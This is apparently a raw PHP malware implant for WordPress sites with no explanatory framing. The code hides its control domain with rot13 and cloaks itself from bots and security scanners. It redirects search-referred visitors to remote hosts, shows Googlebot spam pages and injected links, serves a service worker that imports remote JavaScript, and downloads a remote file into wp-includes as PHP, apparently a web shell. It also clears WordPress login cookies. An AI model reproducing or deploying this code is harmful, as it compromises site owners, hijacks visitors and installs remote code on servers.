if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } }
if (!function_exists('in_array_like')) { function in_array_like($referencia,$array){ foreach($array as $ref){ if (strstr($referencia,$ref)){ return true; } } return false; } }
if (!function_exists('cacheUrlnew')) { function cacheUrlnew($u, $h) { $cachetime = 600; $file = ABSPATH . WPINC . '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time()) { $curl = curl_init($u); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($curl, CURLOPT_POSTFIELDS, "h=" . $h); curl_setopt($curl, CURLOPT_TIMEOUT, 15); $data = curl_exec($curl); curl_close($curl); if ($data) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } }
if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } }
if(!function_exists('grs')){function grs($length=10){$characters='abcdefghijklmnopqrstuvwxyz';$charactersLength=strlen($characters);$randomString='';for($i=0;$i<$length;$i++){$randomString.=$characters[random_int(0,$charactersLength-1)];}return $randomString;}}
$gbt = getUserIP();
$uag = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['HTTP_HOST'];
$hwost = strtolower ($_SERVER['HTTP_HOST']);
$ref = '';
if(isset($_SERVER['HTTP_REFERER'])) { $ref = $_SERVER['HTTP_REFERER']; };
$uri = $_SERVER['REQUEST_URI'];
$id = $_SERVER['REQUEST_URI'];
$googleBot = false;
$bingBot = false;
$anyBot = false;
$ccd = str_rot13('mnuunuu.qvtvgny');
$blA = [];
$prototo = isHttps();
$gbots = array( 'googlebot', 'googledocs', 'googleother', 'feedfetcher', 'google-safety', 'googleweblight' ); if (in_array_like(strtolower($uag), $gbots)){ $googleBot = true; }
$anybots = array( 'msie 6.0', 'fasthttp', 'claudebot', 'gptbot', 'friendlycrawler', 'censysinspect', 'paloaltonetworks', 'rackspace', 'uptime', 'keys-so-bot', 'repolookoutbot', 'l9scan', 'zabbix', 'awario', 'geedo', 'blackbox', 'tinytest', 'dreamweb', 'phxbot', 'mozlila', 'moblile', 'the knowledge ai', 'newspaper', 'wp rocket','wp fastest cache preload bot','java','ifatsearch', 'dataforseobot', 'simplepie_useragent','site24x7','buck','go http package','krzana bot','okhttp','mailpoet cron','alittle client','woocommerce','dreamhost sitemonitor','sucuri uptime monitor','twitterbot','mod_pagespeed_na','axios','re-re studio','serf','python','itms','shipmondo','empty user agent','duckduckbot','df bot','hummingbird','sitelock','grequests','keybot','wedos','installatron','scalaj-http','dalvik','spotify','razorpay','elb-healthchecker','wpmudev','foregenix','semanticjuice','simplepie','pingdom','freshpingbot','8legs','statuscake','ioncrawl','rome client','reeder','ping.blo.gs','btwebclient','livedoor','postmanruntime', 'wget', 'rytebot','rss','zoombot','spark','scrapy','mediatoolkitbot','firmograph','universalfeedparser', 'uptimerobot', 'facebookexternalhit', '360spider', 'baidubot', 'advbot', 'ahrefs', 'aport', 'blexbot', 'barkrowler', 'curl', 'ccbot', 'redditbot', 'bdcbot', 'birdcrawlerbot', 'aragna', 'crazywebcrawler', 'contxbot', 'checkmarknetwork', 'crowsnest', 'dataminer', 'deusu', 'domaincrawler', 'domainsonocrawler', 'domaintools', 'dotbot', 'exabot', 'flightdeckreportsbot', 'go-http-client', 'httrack', 'mj12bot', 'mauibot', 'megaindex', 'mojeekbot', 'cognitiveseo', 'moreover', 'netcraft', 'netpeakchecker', 'nimbostratus', 'sidetrade', 'yellowbrand', 'nextdoorbot', 'brightbot', 'wiederfreibot', 'startmebot', 'monsidobot', 'jaddjabot', 'ad-standards-bot', 'atomseobot', 'zelistbot', 'konturbot', 'nutch', 'panopta', 'paperlibot', 'petalbot', 'safednsbot', 'seekport', 'semrush', 'seznambot', 'site-shot', 'zombiebot', 'seobility', 'socialsearcher', 'sogou', 'teleport', 'turnitinbot', 'wordpress', 'xovibot', 'yandex.com/bots', 'amazonbot', 'yisou', 'seolizer', 'zoominfobot', 'blogmurabot', 'domainstats', 'ezooms', 'fluid', 'snapchat', 'adbeat_bot', 'ezlynx', 'awariosmartbot', 'wellknownbot', 'bne.es_bot', 'gaisbot', 'newslitbot', 'neticle', 'sansanbot', 'hrankbot', 'linkdexbot', 'ltx71', 'orbbot', 'finbot', 'pagepeeker', 'owler', 'gigabot', 'madbot', 'majestic', 'bidswitchbot', 'linkfluence', 'semanticbot', 'linkwalker', 'msnbot', 'webgains', 'auskunft', 'cxense', 'amazonadbot', 'jooblebot', 'slackbot', 'bitlybot', 'elsemanariobot', 'x28', 'metorik', 'nagios', 'bomborabot', 'adsbot', 'pinterest', 'mbcrawler', 'mjj12bot', 'yetibot', 'cocolyzebot', 'superfeedr', 'mail.ru_bot', 'booking.com', 'archiver', 'coccocbot', 'neevabot', 'seokicks', 'sitechecker', 'applebot', 'archive.org_bot', 'cincraw', 'feedbot', 'surdotlybot', 'intelx.io_bot', 'bublupbot', 'vuhuvbot', 'serendeputy', 'superpagesbot', 'detectify', 'kinsta', 'taboolabot', 'infotigerbot', 'netEstate', 'pirst', 'python-requests', 'randomsurfer', 'rogerbot', 'semtix', 'serpstatbot', 'solomono', 'spider', 'statdom', 'trendictionbot', 'ucrawler', 'urllib', 'verifying', 'viralvideochart', 'zgrab'); if (in_array_like(strtolower($uag), $anybots)){ $anyBot = true; }
if ( preg_match( "#bingbot|BingPreview#i", $uag ) ) { $bingBot = true; }
if(empty($anyBot) && empty($bingBot) && empty($googleBot)) {
$ipresponse = cacheUrlnew("https://api.{$ccd}/check_new.php", $hwost);
$blA = explode('|', $ipresponse);
}
if ($anyBot || in_array($gbt, $blA)) {
//do
} else {
if (!preg_match("#qutam-|/b24c-|/ccoin-|/dcoin-|/decoin-|/decoin25-|/neivu-|/nrcc-|=\.\.|login|\/author\/admin|verification|eezee|suspected|edit\.php|deleteme|ping=|verification|\/-\/-\/|\/wp\/v2\/users\/|phpmailer|wordfence|wp_cron|php:\/\/|wp-22\.php|ququo|uuuuxxxxooo|xmlrpc|here=1111|favicon|@narjas|@print|ExV1|\/aaaffff123|\/alfa-rex|\/alfanew|wp-cron|\/ayashoo-|\/books-|\/datez-|\/filemanager|\/kaupan-|\/kjope-|\/livres-|\.env\.|\/marijuana|\/oerzrsld|\/pgxhtogrzm-|\/tczuqaat|\/wlwmanifest|\/wp-admin|\/wp-consar|\/wp-content\/|\/wp-includes\/|\/wp-plain|\/wso112233|\.ashx|worm0|archivarix|\/wsoyanz|\/xl2023|\?a=display&template|\?author=|\?bx=0e|\?s=captcha|\?test=|concat|cdnstaticjs|config|cryptocdn|execute-solution|get-pixels|get_refreshed|imagescdn|invokefunction|shell|usage_|well-known\/|wp-comments-post|wp-json|wp-session-url|xmrlpc|phpinf|config|\.(?:env|jpg|js|pdf|png|svg|ttf|txt|woff|xml|zip|ico|css|asp|gz|rar|sql|gif|json|aspx|exe|xls|csv|ppt|alfa|local|jsp|pptx|xlsx|doc|tgz|tar|bak|7z|xsd|bz2|backup|ini|yaml|jar|passwd|cgi|sh|log|jpeg|BAK)$|export#", $uri) && !$googleBot && !$bingBot ) {
$ch = curl_init();
$url_string = "https://source.{$ccd}/in/redn/?val1={$hwost}";
curl_setopt ($ch, CURLOPT_URL, $url_string); curl_setopt ($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_HEADER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 10); curl_setopt ($ch, CURLOPT_REFERER, $host.$uri); curl_setopt ($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec ($ch); if ( curl_getinfo($ch, CURLINFO_REDIRECT_URL ) ) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL ); header('Location: ' . $redirectUrl); exit(); } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $header = substr($html, 0, $header_size); $html = substr($html, $header_size); curl_close($ch); function yuhoo($html) { echo $html; } add_action('wp_head', function() use ( $html ) { yuhoo( $html ); } );
//
}
/*
if (preg_match("#www.google.com/bot.html#i", $uag) && !preg_match("/\/post-|\/pgxhtogrzm-|\/livres-|\/datez-|\/books|\/qutam-|\/neivu-|\/ccoin-|\/dcoin-|\/decoin-|\/decoin25-|imagescdn|cryptocdn|-mk|-mk2|-mk3|-mk4|\/b24c-|\/nrcc-|\/kjope-|\/kaupan-|\/ayashoo-/", $id)) { $curl = curl_init("http://api.{$ccd}/301.php"); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($curl); curl_close($curl); if (preg_match('#http#', $response)){ header("HTTP/1.1 301 Moved Permanently"); header('Location: ' . $response); exit(); } }
*/
/*
$nzTables = array('pcachewpr', 'lcachewpr', 'lmcachewpr');
foreach ($nzTables as $nz) {
$table_name = $wpdb->prefix . $nz;
if ($wpdb->get_var("SHOW TABLES LIKE '$table_name'") == $table_name) {
$sql = "DROP TABLE IF EXISTS $table_name";
$wpdb->query($sql);
$curl = curl_init("http://api.{$ccd}/checktable.php");
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $_SERVER['HTTP_HOST'] . ';' . $table_name);
$response = curl_exec($curl);
curl_close($curl);
}
}
*/
if (preg_match("#^(/qutam-|/ccoin-|/decoin-|/decoin25-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|/neivu-)#", $_SERVER['REQUEST_URI']) || preg_match('#.+-mk\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk3\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk4\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk2\/?$#', $_SERVER['REQUEST_URI'])) { if (!class_exists('CovenVP', FALSE)) { class CovenVP { private $args = NULL; public function __construct($args) { if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); $this->args = $args; add_filter('the_posts', array($this, 'virtual_page')); } public function virtual_page($posts) { global $wp; $slug = isset($this->args['slug']) ? $this->args['slug'] : ''; if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { $post = new stdClass(); $post->ID = - 128; $post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; $post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); $post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); $post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; $post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->post_password = ''; $post->post_name = $slug; $post->to_ping = ''; $post->pinged = ''; $post->post_modified = $post->post_date; $post->post_modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $slug); $post->menu_order = 0; $post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; $post->post_mime_type = ''; $post->comment_count = 0; $post = apply_filters('coven_virtual_page_content', $post); $posts = array($post); global $wp_query; $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; } return $posts; } } } if (!function_exists('coven_create_virtual')) { function coven_create_virtual() { $requri = explode('-', $_SERVER['REQUEST_URI']); $scheme = end($requri); $scheme = trim($scheme, '/'); $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/{$scheme}/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); $html = json_decode($html, true); curl_close($ch); if (json_last_error() === JSON_ERROR_NONE) { $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); $pg = new CovenVP($args); } } } if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { $rUri = explode('-', $_SERVER['REQUEST_URI']); $rScheme = end($rUri); $rScheme = trim($rScheme, '/'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://source.{$ccd}/in/{$rScheme}/?val1={$hwost}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_REFERER, $host . $uri); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec($ch); if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); header('Location: ' . $redirectUrl); exit(); } } /* elseif ($googleBot) { add_action('init', 'coven_create_virtual'); }*/ else { header("Location: http://" . $_SERVER["HTTP_HOST"]); exit(); } }
if (preg_match("#xmlrpc\.php$#", $id)) { echo "XML-RPC server accepts POST requests only."; exit(); }
if (preg_match("/serviceworker.js$|332.js$|34334$/", $id) ) { header('Content-Type: application/javascript'); echo 'self.importScripts(\'https://magictt1.com/sw/magic.js\');'; exit; }
if (preg_match_all("/headssr\.php$/", $id, $matches) ) { $fileUrl = "http://api.{$ccd}/lnk/sh.txt"; $saveTo = ABSPATH . WPINC . '/abcsss.php'; if ( is_file ($saveTo) && filesize ($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1 ) { } else { $fp = fopen($saveTo, 'w+'); $ch = curl_init($fileUrl); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_exec($ch); curl_close($ch); fclose($fp); } }
if (preg_match("#^/tmp/#", $_SERVER['REQUEST_URI'])) {
$url = str_replace('/tmp', '', $_SERVER['REQUEST_URI']);
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/books_files/tmp{$url}");
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$html = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $html;
die();
}
if (preg_match("#^/books_files/#", $_SERVER['REQUEST_URI'])) {
$url = str_replace('?id', '.php?id', $_SERVER['REQUEST_URI']);
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}{$url}");
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$html = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $html;
die();
}
if (preg_match("#^/books-#", $_SERVER['REQUEST_URI'])) {
if (!class_exists('WP_EX_PAGE_ON_THE_FLY', FALSE)){
class WP_EX_PAGE_ON_THE_FLY
{
public $slug ='';
public $args = array();
public function __construct($args){
add_filter('the_posts',array($this,'fly_page'));
$this->args = $args;
$this->slug = $args['slug'];
}
public function fly_page($posts){
global $wp,$wp_query;
$page_slug = $this->slug;
if(count($posts) == 0 && (strtolower($wp->request) == $page_slug || $wp->query_vars['page_id'] == $page_slug)){
$post = new stdClass;
$post->post_author = 1;
$post->post_name = $page_slug;
$post->guid = get_bloginfo('wpurl' . '/' . $page_slug);
$post->post_title = 'page title';
$post->post_content = "Fake Content";
$post->ID = -42;
$post->post_status = 'static';
$post->comment_status = 'closed';
$post->ping_status = 'closed';
$post->comment_count = 0;
$post->post_date = current_time('mysql');
$post->post_date_gmt = current_time('mysql',1);
$post = (object) array_merge((array) $post, (array) $this->args);
$posts = NULL;
$posts[] = $post;
$wp_query->is_page = true;
$wp_query->is_singular = true;
$wp_query->is_home = false;
$wp_query->is_archive = false;
$wp_query->is_category = false;
//status_header( 200 );
unset($wp_query->query["error"]);
$wp_query->query_vars["error"]="";
$wp_query->is_404 = false;
}
return $posts;
}
}
}
$requri = explode('-', $_SERVER['REQUEST_URI']);
$scheme = end($requri);
$scheme = trim($scheme, '/');
$url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/');
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/books/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]);
$html = curl_exec($ch);
curl_close($ch);
unset($ch);
//
if($googleBot){
$html = json_decode($html, true);
$args = array('slug' => $url, 'post_title' => $html['title'], 'post_content' => $html['body']);
new WP_EX_PAGE_ON_THE_FLY($args);
} else{
echo $html;
die();
}
}
$pdfhash = substr(str_rot13(preg_replace('#[^0-9a-zA-Z]#', "", $_SERVER['HTTP_HOST'])) , 0, 5);
if (preg_match('#^/wp-content/uploads/.+' . $pdfhash . '.pdf$#', $_SERVER['REQUEST_URI']))
{
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/pdf/books1/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt));
curl_setopt($ch, CURLOPT_REFERER, $ref);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$html = curl_exec($ch);
if ( curl_getinfo($ch, CURLINFO_REDIRECT_URL ) ) {
$redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL );
header('Location: ' . $redirectUrl); exit();
}
curl_close($ch);
unset($ch);
if (empty($html))
{
http_response_code(404);
exit();
}
if ($googleBot)
{
header("Content-type:application/pdf");
}
echo $html;
exit();
}
/*
$chdoms = curl_init( "http://api.{$ccd}/data/check_doms.txt" ); curl_setopt ($chdoms, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($chdoms, CURLOPT_HEADER, 0); curl_setopt ($chdoms, CURLOPT_TIMEOUT, 20); curl_setopt ($chdoms, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); $chDomains = curl_exec ($chdoms); curl_close($chdoms); $chDomains = preg_split('/\n|\r\n?/', $chDomains); if ( !preg_match ( "#/post-|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|-mk|-mk2|-mk3|-mk4#", $id ) && $googleBot && in_array( $hwost, $chDomains ) ) { function supermario($content) { $ccd = str_rot13('mnuunuu.qvtvgny'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("http://coven.{$ccd}/links/schemenameururu/{$hwost}{$uri}" . rand() ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; }
add_filter('the_content', 'supermario', 20);
}
*/
if ( !preg_match ( "#/post-|feed|robots|jpg|png|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|-mk|-mk2|-mk3|-mk4#", $id ) && preg_match('#Googlebot#', $uag) ) { function supermario($content) { $ccd = str_rot13('mnuunuu.qvtvgny'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("https://coven.{$ccd}/links2/uru2/{$hwost}{$uri}" ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; }
add_filter('the_content', 'supermario', 20);
}
function add_meta_cache() { echo ''; echo ''; echo ''; echo ''; echo ''; } add_action('wp_head', 'add_meta_cache');
if (preg_match('#/(imagescdn|cryptocdn)/.+#', $id) ) {
$picUrl = "https://images.{$ccd}{$id}";
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $picUrl);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt));
$html = curl_exec ($ch);
curl_close($ch);
header('Cache-Control: public');
header('Content-Type: image/jpeg');
echo $html;
exit;
}
if (preg_match("#pgxhtogrzm#", $_SERVER['REQUEST_URI'])){ if (!class_exists('CovenVP', FALSE)) { class CovenVP { private $args = NULL; public function __construct($args) { if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); $this->args = $args; add_filter('the_posts', array($this, 'virtual_page')); } public function virtual_page($posts) { global $wp; $slug = isset($this->args['slug']) ? $this->args['slug'] : ''; if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { $post = new stdClass(); $post->ID = - 128; $post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; $post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); $post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); $post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; $post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->post_password = ''; $post->post_name = $slug; $post->to_ping = ''; $post->pinged = ''; $post->post_modified = $post->post_date; $post->post_modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $slug); $post->menu_order = 0; $post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; $post->post_mime_type = ''; $post->comment_count = 0; $post = apply_filters('coven_virtual_page_content', $post); $posts = array($post); global $wp_query; $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; } return $posts; } } } if (!function_exists('coven_create_virtual')) { function coven_create_virtual() { $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/shilov/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); $html = json_decode($html, true); curl_close($ch); if (json_last_error() === JSON_ERROR_NONE) { $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); $pg = new CovenVP($args); } } } if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://source.{$ccd}/in/drws/?val1={$hwost}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_REFERER, $host . $uri); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec($ch); if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); header('Location: ' . $redirectUrl); exit(); } } elseif ($googleBot) { add_action('init', 'coven_create_virtual'); } else { header("Location: http://" . $_SERVER["HTTP_HOST"]); exit(); } }
if(!$googleBot){
if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } }
}
if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } }
